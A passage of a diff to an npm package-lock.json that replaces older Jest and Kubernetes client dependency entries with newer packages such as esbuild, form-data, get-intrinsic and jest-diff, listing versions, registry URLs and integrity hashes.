- "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", + "node_modules/delayed-stream": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", + "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=", "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=0.4.0" } }, - "node_modules/@jest/reporters/node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/@jest/reporters/node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", + "node_modules/dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", "dev": true, + "license": "MIT", "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" + "node": ">= 0.4" } }, - "node_modules/@jest/reporters/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", + "node_modules/end-of-stream": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", + "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "license": "MIT", + "dependencies": { + "once": "^1.4.0" } }, - "node_modules/@jest/reporters/node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", + "node_modules/es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" } }, - "node_modules/@jest/reporters/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + "node_modules/es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, + "license": "MIT", "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" + "node": ">= 0.4" } }, - "node_modules/@jest/reporters/node_modules/write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", + "node_modules/es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", "dev": true, + "license": "MIT", "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" + "es-errors": "^1.3.0" }, "engines": { - "node": "^14.17.0 || ^16.13.0 || >=18.0.0" + "node": ">= 0.4" } }, - "node_modules/@jest/schemas": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.4.0.tgz", - "integrity": "sha512-0E01f/gOZeNTG76i5eWWSupvSHaIINrTie7vCyjiYFKgzNdyEGd12BUv4oNBFHOqlHDbtoJi3HrQ38KCC90NsQ==", + "node_modules/es-set-tostringtag": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", "dev": true, + "license": "MIT", "dependencies": { - "@sinclair/typebox": "^0.25.16" + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" } }, - "node_modules/@jest/source-map": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.2.0.tgz", - "integrity": "sha512-1NX9/7zzI0nqa6+kgpSdKPK+WU1p+SJk3TloWZf5MzPbxri9UEeXX5bWZAPCzbQcyuAzubcdUHA7hcNznmRqWQ==", + "node_modules/esbuild": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.25.6.tgz", + "integrity": "sha512-GVuzuUwtdsghE3ocJ9Bs8PNoF13HNQ5TXbEi2AhvVb8xU1Iwt9Fos9FEamfoee+u/TOsn7GUWc04lz46n2bbTg==", "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.15", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" + "hasInstallScript": true, + "license": "MIT", + "bin": { + "esbuild": "bin/esbuild" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=18" + }, + "optionalDependencies": { + "@esbuild/aix-ppc64": "0.25.6", + "@esbuild/android-arm": "0.25.6", + "@esbuild/android-arm64": "0.25.6", + "@esbuild/android-x64": "0.25.6", + "@esbuild/darwin-arm64": "0.25.6", + "@esbuild/darwin-x64": "0.25.6", + "@esbuild/freebsd-arm64": "0.25.6", + "@esbuild/freebsd-x64": "0.25.6", + "@esbuild/linux-arm": "0.25.6", + "@esbuild/linux-arm64": "0.25.6", + "@esbuild/linux-ia32": "0.25.6", + "@esbuild/linux-loong64": "0.25.6", + "@esbuild/linux-mips64el": "0.25.6", + "@esbuild/linux-ppc64": "0.25.6", + "@esbuild/linux-riscv64": "0.25.6", + "@esbuild/linux-s390x": "0.25.6", + "@esbuild/linux-x64": "0.25.6", + "@esbuild/netbsd-arm64": "0.25.6", + "@esbuild/netbsd-x64": "0.25.6", + "@esbuild/openbsd-arm64": "0.25.6", + "@esbuild/openbsd-x64": "0.25.6", + "@esbuild/openharmony-arm64": "0.25.6", + "@esbuild/sunos-x64": "0.25.6", + "@esbuild/win32-arm64": "0.25.6", + "@esbuild/win32-ia32": "0.25.6", + "@esbuild/win32-x64": "0.25.6" } }, - "node_modules/@jest/test-result": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.4.1.tgz", - "integrity": "sha512-WRt29Lwt+hEgfN8QDrXqXGgCTidq1rLyFqmZ4lmJOpVArC8daXrZWkWjiaijQvgd3aOUj2fM8INclKHsQW9YyQ==", + "node_modules/escape-string-regexp": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", + "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", "dev": true, - "dependencies": { - "@jest/console": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=8" } }, - "node_modules/@jest/test-sequencer": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.4.1.tgz", - "integrity": "sha512-v5qLBNSsM0eHzWLXsQ5fiB65xi49A3ILPSFQKPXzGL4Vyux0DPZAIN7NAFJa9b4BiTDP9MBF/Zqc/QA1vuiJ0w==", + "node_modules/fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==", "dev": true, - "dependencies": { - "@jest/test-result": "^29.4.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } + "license": "MIT" }, - "node_modules/@jest/test-sequencer/node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", + "node_modules/fill-range": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", + "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", "dev": true, "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" + "to-regex-range": "^5.0.1" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" + "node": ">=8" } }, - "node_modules/@jest/test-sequencer/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", + "node_modules/form-data": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", + "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", "dev": true, + "license": "MIT", + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", + "mime-types": "^2.1.12" + }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 6" } }, - "node_modules/@jest/test-sequencer/node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", + "node_modules/function-bind": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@jest/test-sequencer/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + "node_modules/get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", "dev": true, + "license": "MIT", "dependencies": { - "has-flag": "^4.0.0" + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" }, "engines": { - "node": ">=10" + "node": ">= 0.4" }, "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@jest/types": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.4.1.tgz", - "integrity": "sha512-zbrAXDUOnpJ+FMST2rV7QZOgec8rskg2zv8g2ajeqitp4tvZiyqTCYXANrKsM+ryj5o+LI+ZN2EgU9drrkiwSA==", + "node_modules/get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", "dev": true, + "license": "MIT", "dependencies": { - "@jest/schemas": "^29.4.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" } }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", + "node_modules/gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - }, + "license": "MIT", "engines": { - "node": ">=6.0.0" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", + "node_modules/graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "dev": true, + "license": "ISC" + }, + "node_modules/has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", "dev": true, "engines": { - "node": ">=6.0.0" + "node": ">=8" } }, - "node_modules/@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", + "node_modules/has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", "dev": true, + "license": "MIT", "engines": { - "node": ">=6.0.0" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.17", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.17.tgz", - "integrity": "sha512-MCNzAp77qzKca9+W/+I0+sEpaUnZoeasnghNeVc41VZCEKaCH73Vq3BZZ/SzWIgrqE4H4ceI+p+b6C0mHf9T4g==", + "node_modules/has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", "dev": true, + "license": "MIT", "dependencies": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" + "has-symbols": "^1.0.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@kubernetes/client-node": { - "version": "0.18.1", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.18.1.tgz", - "integrity": "sha512-F3JiK9iZnbh81O/da1tD0h8fQMi/MDttWc/JydyUVnjPEom55wVfnpl4zQ/sWD4uKB8FlxYRPiLwV2ZXB+xPKw==", + "node_modules/hasown": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", + "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "dev": true, + "license": "MIT", "dependencies": { - "@types/js-yaml": "^4.0.1", - "@types/node": "^18.11.17", - "@types/request": "^2.47.1", - "@types/ws": "^8.5.3", - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^7.2.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^6.1.11", - "tmp-promise": "^3.0.2", - "tslib": "^2.4.1", - "underscore": "^1.13.6", - "ws": "^8.11.0" + "function-bind": "^1.1.2" }, - "optionalDependencies": { - "openid-client": "^5.3.0" + "engines": { + "node": ">= 0.4" } }, - "node_modules/@kubernetes/client-node/node_modules/@types/node": { - "version": "18.13.0", - "resolved": "https://registry.npmjs.org/@types/node/-/node-18.13.0.tgz", - "integrity": "sha512-gC3TazRzGoOnoKAhUx+Q0t8S9Tzs74z7m0ipwGpSqQrleP14hKxP4/JUeEQcD3W1/aIpnWl8pHowI7WokuZpXg==" - }, - "node_modules/@sinclair/typebox": { - "version": "0.25.21", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.25.21.tgz", - "integrity": "sha512-gFukHN4t8K4+wVC+ECqeqwzBDeFeTzBXroBTqE6vcWrQGbEUpHO7LYdG0f4xnvYq4VOEwITSlHlp0JBAIFMS/g==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-2.0.0.tgz", - "integrity": "sha512-uLa0j859mMrg2slwQYdO/AkrOfmH+X6LTVmNTS9CqexuE2IvVORIkSpJLqePAbEnKJ77aMmCwr1NUZ57120Xcg==", + "node_modules/hpagent": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", "dev": true, - "dependencies": { - "type-detect": "4.0.8" + "license": "MIT", + "engines": { + "node": ">=14" } }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.0.2", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.0.2.tgz", - "integrity": "sha512-SwUDyjWnah1AaNl7kxsa7cfLhlTYoiyhDAIgyh+El30YvXs/o7OLXpYH88Zdhyx9JExKrmHDJ+10bwIcY80Jmw==", + "node_modules/ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", "dev": true, + "license": "MIT", "dependencies": { - "@sinonjs/commons": "^2.0.0" + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" + }, + "engines": { + "node": ">= 12" } }, - "node_modules/@types/babel__core": { - "version": "7.1.15", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.1.15.tgz", - "integrity": "sha512-bxlMKPDbY8x5h6HBwVzEOk2C8fb6SLfYQ5Jw3uBYuYF1lfWk/kbLd81la82vrIkBb0l+JdmrZaDikPrNxpS/Ew==", + "node_modules/ip-address/node_modules/sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } + "license": "BSD-3-Clause" }, - "node_modules/@types/babel__generator": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.3.tgz", - "integrity": "sha512-/GWCmzJWqV7diQW54smJZzWbSFf4QYtF71WCKhcx6Ru/tFyQIY2eiiITcCAeuPbNSvT9YCGkVMqqvSk2Z0mXiA==", + "node_modules/is-number": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" + "engines": { + "node": ">=0.12.0" } }, - "node_modules/@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", + "node_modules/isomorphic-ws": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", + "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" + "peerDependencies": { + "ws": "*" } }, - "node_modules/@types/babel__traverse": { - "version": "7.14.2", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.14.2.tgz", - "integrity": "sha512-K2waXdXBi2302XUdcHcR1jCeU0LL4TD9HRs/gk0N2Xvrht+G/BfJa4QObBQZfhMdxiCpV3COl5Nfq4uKTeTnJA==", + "node_modules/jest-diff": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-30.0.4.tgz", + "integrity": "sha512-TSjceIf6797jyd+R64NXqicttROD+Qf98fex7CowmlSn7f8+En0da1Dglwr1AXxDtVizoxXYZBlUQwNhoOXkNw==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.3.0" + "@jest/diff-sequences": "30.0.1", + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "pretty-format": "30.0.2" + }, + "engines": { + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@types/caseless": { - "version": "0.12.2", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.2.tgz", - "integrity": "sha512-6ckxMjBBD8URvjB6J3NcnuAn5Pkl7t3TizAg+xdlzzQGSPSmBcXf8KoIH0ua/i+tio+ZRUHEXp0HEmvaR4kt0w==" - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.5", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.5.tgz", - "integrity": "sha512-anKkLmZZ+xm4p8JWBf4hElkM4XR+EZeA2M9BAkkTldmcyDY4mbdIJnRghDJH3Ov5ooY7/UAoENtmdMSkaAd7Cw==", + "node_modules/jest-diff/node_modules/@jest/schemas": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-30.0.1.tgz", + "integrity": "sha512-+g/1TKjFuGrf1Hh0QPCv0gISwBxJ+MQSNXmG9zjHy7BmFhtoJ9fdNhWJp3qUKRi93AOZHXtdxZgJ1vAtz6z65w==", "dev": true, + "license": "MIT", "dependencies": { - "@types/node": "*" + "@sinclair/typebox": "^0.34.0" + }, + "engines": { + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.3.tgz", - "integrity": 